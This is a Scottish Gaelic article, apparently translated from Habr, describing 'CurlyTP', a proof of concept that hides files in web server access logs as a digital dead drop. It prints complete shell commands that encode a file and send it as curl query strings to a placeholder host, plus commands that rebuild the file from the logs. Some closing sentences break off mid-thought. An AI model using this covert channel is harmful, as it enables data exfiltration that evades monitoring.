A rèir mìneachadh Wikipedia, tha tuiteam marbh na inneal co-fheall a bhios a ’dèanamh iomlaid air fiosrachadh no cuid de nithean eadar daoine a’ cleachdadh àite dìomhair. Is e am beachd nach bi daoine a’ coinneachadh - ach bidh iad fhathast ag iomlaid fiosrachaidh gus sàbhailteachd obrachaidh a chumail suas.
Cha bu chòir don àite falaich aire a tharraing. Mar sin, anns an t-saoghal far-loidhne bidh iad gu tric a’ cleachdadh rudan falaichte: breige sgaoilte sa bhalla, leabhar leabharlainn, no lag ann an craobh.
Tha mòran innealan crioptachaidh agus gun urra air an eadar-lìn, ach tha an fhìrinn mu bhith a’ cleachdadh nan innealan sin a’ tarraing aire. A bharrachd air an sin, faodaidh iad a bhith air am bacadh aig ìre corporra no riaghaltais. Dè a nì thu?
Mhol an leasaiche Ryan Flowers roghainn inntinneach -
Tha e a 'tionndadh a-mach gu bheil frithealaiche lìn sam bith a' leigeil leat cha mhòr teachdaireachd sam bith a shàbhaladh sa log. Bha flùraichean a 'faighneachd ciamar a chleachdar seo.
Tha e a’ tabhann an roghainn seo:
- Gabh faidhle teacsa (teachdaireachd dìomhair) agus obraich a-mach an hash (md5sum).
- Bidh sinn ga chòdachadh (gzip + uuencode).
- Bidh sinn a’ sgrìobhadh chun loga a’ cleachdadh iarrtas a tha ceàrr a dh’aona ghnothach chun an fhrithealaiche.
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh
Gus faidhle a leughadh, feumaidh tu na h-obraichean sin a dhèanamh ann an òrdugh cùil: dì-chòdachadh agus unzip am faidhle, thoir sùil air an hash (faodar an hash a ghluasad gu sàbhailte thairis air seanalan fosgailte).
Tha àiteachan air an cur nan àite =+=
gus nach bi beàrnan anns an t-seòladh. Bidh am prògram, ris an can an t-ùghdar CurlyTP, a’ cleachdadh còdachadh base64, leithid ceanglachan post-d. Tha an t-iarrtas air a dhèanamh le prìomh fhacal ?transfer?
gus am faigh an neach a gheibh e gu furasta e anns na logaichean.
Dè a chì sinn anns na clàran sa chùis seo?
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"
Mar a chaidh ainmeachadh roimhe, gus teachdaireachd dhìomhair fhaighinn feumaidh tu na h-obraichean a choileanadh ann an òrdugh cùil:
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g
Tha am pròiseas furasta a dhèanamh fèin-ghluasadach. Tha md5sum a’ maidseadh, agus tha susbaint an fhaidhle a’ dearbhadh gun deach a h-uile càil a chòdachadh gu ceart.
Tha an dòigh-obrach gu math sìmplidh. “Is e adhbhar na h-eacarsaich seo dìreach dearbhadh gun gabh faidhlichean a ghluasad tro iarrtasan lìn beaga neo-chiontach, agus bidh e ag obair air frithealaiche lìn sam bith le logaichean teacsa sìmplidh. Gu bunaiteach, tha a h-uile frithealaiche lìn na àite falaich! ” sgrìobh Flowers.
Gu dearbh, chan obraich an dòigh ach ma tha cothrom aig an neach a gheibh e air logaichean frithealaiche. Ach tha an leithid de ruigsinneachd air a thoirt seachad, mar eisimpleir, le mòran de luchd-aoigheachd.
Ciamar a chleachdadh?
Tha Ryan Flowers ag ràdh nach e eòlaiche tèarainteachd fiosrachaidh a th’ ann agus nach cuir e ri chèile liosta de chleachdaidhean a dh’ fhaodadh a bhith ann airson CurlyTP. Dha, tha e dìreach na dhearbhadh air bun-bheachd gum faodar na h-innealan eòlach a chì sinn a h-uile latha a chleachdadh ann an dòigh neo-ghnàthach.
Gu dearbh, tha grunn bhuannachdan aig an dòigh seo thairis air “falaich” frithealaiche eile mar
Is e seo aon de na dòighean air teachdaireachdan a chuir tro fhaidhlichean seirbheis. Faodaidh tu cuimhneachadh mar a b’ àbhaist do chuid de chompanaidhean adhartach a bhith a’ suidheachadh
B’ e am beachd nach biodh ach luchd-leasachaidh lìn a’ faicinn an ugh Càisge seo, leis nach biodh neach àbhaisteach a’ coimhead air cinn-cinn no còd HTML.
Source: www.habr.com